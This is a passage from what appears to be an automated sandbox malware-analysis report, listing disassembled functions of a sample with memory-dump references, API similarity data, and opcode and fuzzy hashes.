                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DefaultLocaleQuery
                                                                                                      • String ID: L$L$R$W$_Q$a$a$b$d$i$o$r$r$y
                                                                                                      • API String ID: 2949231068-2907935017
                                                                                                      • Opcode ID: e07887ac4e125d2375f3faf340064a666ad0bea6e1931074ffa21c8f77e3ed79
                                                                                                      • Instruction ID: 628c437b2a7803a180bea8ffb5182a20a644706fd1e4682e06375538a064bb6d
                                                                                                      • Opcode Fuzzy Hash: e07887ac4e125d2375f3faf340064a666ad0bea6e1931074ffa21c8f77e3ed79
                                                                                                      • Instruction Fuzzy Hash: 29D1F1B1D052688AF7208A64DC84BEAB775FF50304F0540FAD84D9A281E73D9EC68F66
                                                                                                      Function 0040D2D8 Relevance: 26.6, APIs: 1, Strings: 14, Instructions: 360nativeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 0041656B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DefaultLocaleQuery
                                                                                                      • String ID: L$L$R$W$_Q$a$a$b$d$i$o$r$r$y
                                                                                                      • API String ID: 2949231068-2907935017
                                                                                                      • Opcode ID: 94efc96177c0c701af20182f296c3142bf14a39beea66799957dffb793fe6f19
                                                                                                      • Instruction ID: 140fe670e3d9463840d9cb59283cf26cf9b33eb3f4138c72ae0861693c982ce4
                                                                                                      • Opcode Fuzzy Hash: 94efc96177c0c701af20182f296c3142bf14a39beea66799957dffb793fe6f19
                                                                                                      • Instruction Fuzzy Hash: 79D1F1B1D052688AF7208A24DC84BEAB775FF50304F0540FAD84D9A281E73D9EC68F66
                                                                                                      Function 0040D095 Relevance: 26.6, APIs: 1, Strings: 14, Instructions: 356nativeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 0041656B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DefaultLocaleQuery
                                                                                                      • String ID: L$L$R$W$_Q$a$a$b$d$i$o$r$r$y
                                                                                                      • API String ID: 2949231068-2907935017
                                                                                                      • Opcode ID: 94410c603f2da0342e268cae34ffafd61373131a9fa116498ccd0330f97e39d5
                                                                                                      • Instruction ID: d2a0e105321e892f68f773667fd454968f7a916451efc91e5749a62f8b47f556
                                                                                                      • Opcode Fuzzy Hash: 94410c603f2da0342e268cae34ffafd61373131a9fa116498ccd0330f97e39d5
                                                                                                      • Instruction Fuzzy Hash: 2DD1F3B1D052688EF7208A24DC84BEA7775FF50314F0540FAD84D9A281E73D5ED68F66
                                                                                                      Function 00416080 Relevance: 26.6, APIs: 1, Strings: 14, Instructions: 348nativeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 0041656B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DefaultLocaleQuery
                                                                                                      • String ID: L$L$R$W$_Q$a$a$b$d$i$o$r$r$y
                                                                                                      • API String ID: 2949231068-2907935017
                                                                                                      • Opcode ID: 64f600a5aebd3d6f4f8648a306598cb53516d24607eabe7c026cd07f3f543d79
                                                                                                      • Instruction ID: 17b60ee1f1b51dbc5296d2c0e0d780ae8934e617b73ce140820b123530eed17b
                                                                                                      • Opcode Fuzzy Hash: 64f600a5aebd3d6f4f8648a306598cb53516d24607eabe7c026cd07f3f543d79
                                                                                                      • Instruction Fuzzy Hash: 67D1E3B1D052688AF7208B24DC44BEAB7B5FF50314F0580FAD84D96281E73D9ED58F66
                                                                                                      Function 00415CBA Relevance: 26.6, APIs: 1, Strings: 14, Instructions: 348nativeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 0041656B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DefaultLocaleQuery
                                                                                                      • String ID: L$L$R$W$_Q$a$a$b$d$i$o$r$r$y
                                                                                                      • API String ID: 2949231068-2907935017
                                                                                                      • Opcode ID: b168c224b3a11599bebc9e12593427c06af2f7042f362e81dfffa23516156708
                                                                                                      • Instruction ID: 5095731c0ee5b81b9e8a7a0a99004274b1bc7aa961a6190ce160d1b1aab1bdb1
                                                                                                      • Opcode Fuzzy Hash: b168c224b3a11599bebc9e12593427c06af2f7042f362e81dfffa23516156708
                                                                                                      • Instruction Fuzzy Hash: 07D1E1B1D046688AF7208B24DC94BEA7BB5FF90314F0480FAD84D96281E77D5EC5CB66
                                                                                                      Function 00416087 Relevance: 26.6, APIs: 1, Strings: 14, Instructions: 346nativeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 0041656B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DefaultLocaleQuery
                                                                                                      • String ID: L$L$R$W$_Q$a$a$b$d$i$o$r$r$y
                                                                                                      • API String ID: 2949231068-2907935017
                                                                                                      • Opcode ID: 12839d7a72c74f0cb3b009d524b7a37184df942e5158033873883b660757a087
                                                                                                      • Instruction ID: a197a2adcb8a4f32713741c46d5dc75914f188f41b298df26548488b8cc312ea
                                                                                                      • Opcode Fuzzy Hash: 12839d7a72c74f0cb3b009d524b7a37184df942e5158033873883b660757a087
                                                                                                      • Instruction Fuzzy Hash: 0FD1E2B1D052688AF7208B24DC44BEAB7B5FF50314F0580FAD84D9A281E73D9ED58F66
                                                                                                      Function 00416086 Relevance: 26.6, APIs: 1, Strings: 14, Instructions: 346nativeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 0041656B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DefaultLocaleQuery
                                                                                                      • String ID: L$L$R$W$_Q$a$a$b$d$i$o$r$r$y
                                                                                                      • API String ID: 2949231068-2907935017
                                                                                                      • Opcode ID: f8940c1c3be38f9d3282a1a35450aa9b6e17c063b1a6f7cb6a191c9b53622110
                                                                                                      • Instruction ID: a197a2adcb8a4f32713741c46d5dc75914f188f41b298df26548488b8cc312ea
                                                                                                      • Opcode Fuzzy Hash: f8940c1c3be38f9d3282a1a35450aa9b6e17c063b1a6f7cb6a191c9b53622110
                                                                                                      • Instruction Fuzzy Hash: 0FD1E2B1D052688AF7208B24DC44BEAB7B5FF50314F0580FAD84D9A281E73D9ED58F66
                                                                                                      Function 00415EBF Relevance: 26.6, APIs: 1, Strings: 14, Instructions: 339COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DefaultLocaleQuery
                                                                                                      • String ID: L$L$R$W$_Q$a$a$b$d$i$o$r$r$y
                                                                                                      • API String ID: 2949231068-2907935017
                                                                                                      • Opcode ID: aca427800d73f7bb910f6085b82575b6a71a849f74f41ad45ef95830556fd7e4
                                                                                                      • Instruction ID: f28ea82273a9fad18d487d8ee150b49fed528c9e5bf83c273f315226fe9dc2c5
                                                                                                      • Opcode Fuzzy Hash: aca427800d73f7bb910f6085b82575b6a71a849f74f41ad45ef95830556fd7e4
                                                                                                      • Instruction Fuzzy Hash: 55D1F3B1D052688AF7208B24DC84BEA77B5FF50314F0540FAD84D9A281E73D9ED68F66
                                                                                                      Function 00415AE0 Relevance: 26.6, APIs: 1, Strings: 14, Instructions: 334nativeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 0041656B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DefaultLocaleQuery
                                                                                                      • String ID: L$L$R$W$_Q$a$a$b$d$i$o$r$r$y
                                                                                                      • API String ID: 2949231068-2907935017
                                                                                                      • Opcode ID: 4fac8aea420bf540f064cf19b2cdac1e621bcaecb8d7b1c2aaf6f33326670b4d
                                                                                                      • Instruction ID: c56e8ed920d0a9c553f0c421afdcac3c69bb952643d445731ab76cc16c98a4e9
                                                                                                      • Opcode Fuzzy Hash: 4fac8aea420bf540f064cf19b2cdac1e621bcaecb8d7b1c2aaf6f33326670b4d
                                                                                                      • Instruction Fuzzy Hash: 01C1E2B1D046689AF7208B24DC84BEA7B75FF90314F0480FAD84D96281E77D5EC6CB66
                                                                                                      Function 00415AAE Relevance: 26.6, APIs: 1, Strings: 14, Instructions: 334nativeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 0041656B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DefaultLocaleQuery
                                                                                                      • String ID: L$L$R$W$_Q$a$a$b$d$i$o$r$r$y
                                                                                                      • API String ID: 2949231068-2907935017
                                                                                                      • Opcode ID: 9dd6c882f793683a887b4c07cfc81b5d37eba2a8b98b79440f054ebebc0dd824
